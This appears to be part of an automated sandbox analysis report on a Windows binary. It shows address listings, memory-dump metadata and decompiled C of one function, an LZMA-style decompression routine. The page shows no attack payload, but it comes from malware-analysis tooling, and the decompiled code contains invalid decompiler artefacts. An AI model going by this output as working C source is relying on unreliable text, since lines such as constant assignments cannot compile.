                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406915
                                                                                        0x00406918
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040654f
                                                                                        0x00406551
                                                                                        0x00406558
                                                                                        0x00406559
                                                                                        0x0040655b
                                                                                        0x0040655e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406566
                                                                                        0x00406569
                                                                                        0x0040656c
                                                                                        0x0040656e
                                                                                        0x00406570
                                                                                        0x00406570
                                                                                        0x00406571
                                                                                        0x00406574
                                                                                        0x0040657b
                                                                                        0x0040657e
                                                                                        0x0040658c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406862
                                                                                        0x00406862
                                                                                        0x00406865
                                                                                        0x0040686c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406871
                                                                                        0x00406871
                                                                                        0x00406875
                                                                                        0x004069ad
                                                                                        0x00000000
                                                                                        0x004069ad
                                                                                        0x0040687b
                                                                                        0x0040687e
                                                                                        0x00406881
                                                                                        0x00406885
                                                                                        0x00406888
                                                                                        0x0040688e
                                                                                        0x00406890
                                                                                        0x00406890
                                                                                        0x00406890
                                                                                        0x00406893
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406896
                                                                                        0x00406899
                                                                                        0x00406899
                                                                                        0x0040689d
                                                                                        0x004068fd
                                                                                        0x00406900
                                                                                        0x00406905
                                                                                        0x00406906
                                                                                        0x00406908
                                                                                        0x0040690a
                                                                                        0x0040690d
                                                                                        0x00000000
                                                                                        0x0040690d
                                                                                        0x0040689f
                                                                                        0x004068a5
                                                                                        0x004068a8
                                                                                        0x004068ab
                                                                                        0x004068ae
                                                                                        0x004068b1
                                                                                        0x004068b4
                                                                                        0x004068b7
                                                                                        0x004068ba
                                                                                        0x004068bd
                                                                                        0x004068c0
                                                                                        0x004068d9
                                                                                        0x004068dc
                                                                                        0x004068df
                                                                                        0x004068e2
                                                                                        0x004068e6
                                                                                        0x004068e8
                                                                                        0x004068e8
                                                                                        0x004068e9
                                                                                        0x004068ec
                                                                                        0x004068c2
                                                                                        0x004068c2
                                                                                        0x004068ca
                                                                                        0x004068cf
                                                                                        0x004068d1
                                                                                        0x004068d4
                                                                                        0x004068d4
                                                                                        0x004068ef
                                                                                        0x004068f6
                                                                                        0x00000000
                                                                                        0x004068f8
                                                                                        0x00000000
                                                                                        0x004068f8
                                                                                        0x00000000
                                                                                        0x00406594
                                                                                        0x00406597
                                                                                        0x004065cd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x004066fd
                                                                                        0x00406700
                                                                                        0x00406700
                                                                                        0x00406703
                                                                                        0x00406705
                                                                                        0x0040698f
                                                                                        0x00000000
                                                                                        0x0040698f
                                                                                        0x0040670b
                                                                                        0x0040670e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406714
                                                                                        0x00406718
                                                                                        0x0040671b
                                                                                        0x0040671b
                                                                                        0x0040671b
                                                                                        0x00000000
                                                                                        0x0040671b
                                                                                        0x00406599
                                                                                        0x0040659b
                                                                                        0x0040659d
                                                                                        0x0040659f
                                                                                        0x004065a2
                                                                                        0x004065a3
                                                                                        0x004065a5
                                                                                        0x004065a7
                                                                                        0x004065aa
                                                                                        0x004065ad
                                                                                        0x004065c3
                                                                                        0x004065c8
                                                                                        0x00406600
                                                                                        0x00406600
                                                                                        0x00406604
                                                                                        0x00406630
                                                                                        0x00406632
                                                                                        0x00406639
                                                                                        0x0040663c
                                                                                        0x0040663f
                                                                                        0x0040663f
                                                                                        0x00406644
                                                                                        0x00406644
                                                                                        0x00406646
                                                                                        0x00406649
                                                                                        0x00406650
                                                                                        0x00406653
                                                                                        0x00406680
                                                                                        0x00406680
                                                                                        0x00406683
                                                                                        0x00406686
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x004066fa
                                                                                        0x00000000
                                                                                        0x004066fa
                                                                                        0x00406688
                                                                                        0x0040668e
                                                                                        0x00406691
                                                                                        0x00406694
                                                                                        0x00406697
                                                                                        0x0040669a
                                                                                        0x0040669d
                                                                                        0x004066a0
                                                                                        0x004066a3
                                                                                        0x004066a6
                                                                                        0x004066a9
                                                                                        0x004066c2
                                                                                        0x004066c4
                                                                                        0x004066c7
                                                                                        0x004066c8
                                                                                        0x004066cb
                                                                                        0x004066cd
                                                                                        0x004066d0
                                                                                        0x004066d2
                                                                                        0x004066d4
                                                                                        0x004066d7
                                                                                        0x004066d9
                                                                                        0x004066dc
                                                                                        0x004066e0
                                                                                        0x004066e2
                                                                                        0x004066e2
                                                                                        0x004066e3
                                                                                        0x004066e6
                                                                                        0x004066e9
                                                                                        0x004066ab
                                                                                        0x004066ab
                                                                                        0x004066b3
                                                                                        0x004066b8
                                                                                        0x004066ba
                                                                                        0x004066bd
                                                                                        0x004066bd
                                                                                        0x004066ec
                                                                                        0x004066f3
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x0040667d
                                                                                        0x00000000
                                                                                        0x004066f5
                                                                                        0x00000000
                                                                                        0x004066f5
                                                                                        0x004066f3
                                                                                        0x00406606
                                                                                        0x00406609
                                                                                        0x0040660b
                                                                                        0x0040660e
                                                                                        0x00406611
                                                                                        0x00406614
                                                                                        0x00406616
                                                                                        0x00406619
                                                                                        0x0040661c
                                                                                        0x0040661c
                                                                                        0x0040661f
                                                                                        0x0040661f
                                                                                        0x00406622
                                                                                        0x00406629
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x004065fd
                                                                                        0x00000000
                                                                                        0x0040662b
                                                                                        0x00000000
                                                                                        0x0040662b
                                                                                        0x00406629
                                                                                        0x004065af
                                                                                        0x004065b2
                                                                                        0x004065b4
                                                                                        0x004065b7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406316
                                                                                        0x00406316
                                                                                        0x0040631a
                                                                                        0x0040695f
                                                                                        0x00000000
                                                                                        0x0040695f
                                                                                        0x00406320
                                                                                        0x00406323
                                                                                        0x00406326
                                                                                        0x00406329
                                                                                        0x0040632c
                                                                                        0x0040632f
                                                                                        0x00406332
                                                                                        0x00406334
                                                                                        0x00406337
                                                                                        0x0040633a
                                                                                        0x0040633d
                                                                                        0x0040633f
                                                                                        0x0040633f
                                                                                        0x0040633f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040671e
                                                                                        0x0040671e
                                                                                        0x0040671e
                                                                                        0x00406722
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00406728
                                                                                        0x0040672b
                                                                                        0x0040672e
                                                                                        0x00406731
                                                                                        0x00406733
                                                                                        0x00406733
                                                                                        0x00406733
                                                                                        0x00406736
                                                                                        0x00406739
                                                                                        0x0040673c
                                                                                        0x0040673f
                                                                                        0x00406742
                                                                                        0x00406745
                                                                                        0x00406746
                                                                                        0x00406748
                                                                                        0x00406748
                                                                                        0x00406748
                                                                                        0x0040674b
                                                                                        0x0040674e
                                                                                        0x00406751
                                                                                        0x00406754
                                                                                        0x00406757
                                                                                        0x0040675b
                                                                                        0x0040675d
                                                                                        0x00406760
                                                                                        0x00000000
                                                                                        0x00406762
                                                                                        0x00000000
                                                                                        0x00406762
                                                                                        0x00406760
                                                                                        0x00406995
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405fc4

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                        • Instruction ID: e06b97397237a54a8f7c6fae7a0c48c933f493286525731b7b3672fa0d973436
                                                                                        • Opcode Fuzzy Hash: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                        • Instruction Fuzzy Hash: 678155B1D00229CFDF24CFA8C8447ADBBB1FB44305F25816AD456BB281D7789A96CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405F82, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 98%
                                                                                        			E00405F82(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004069D4))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
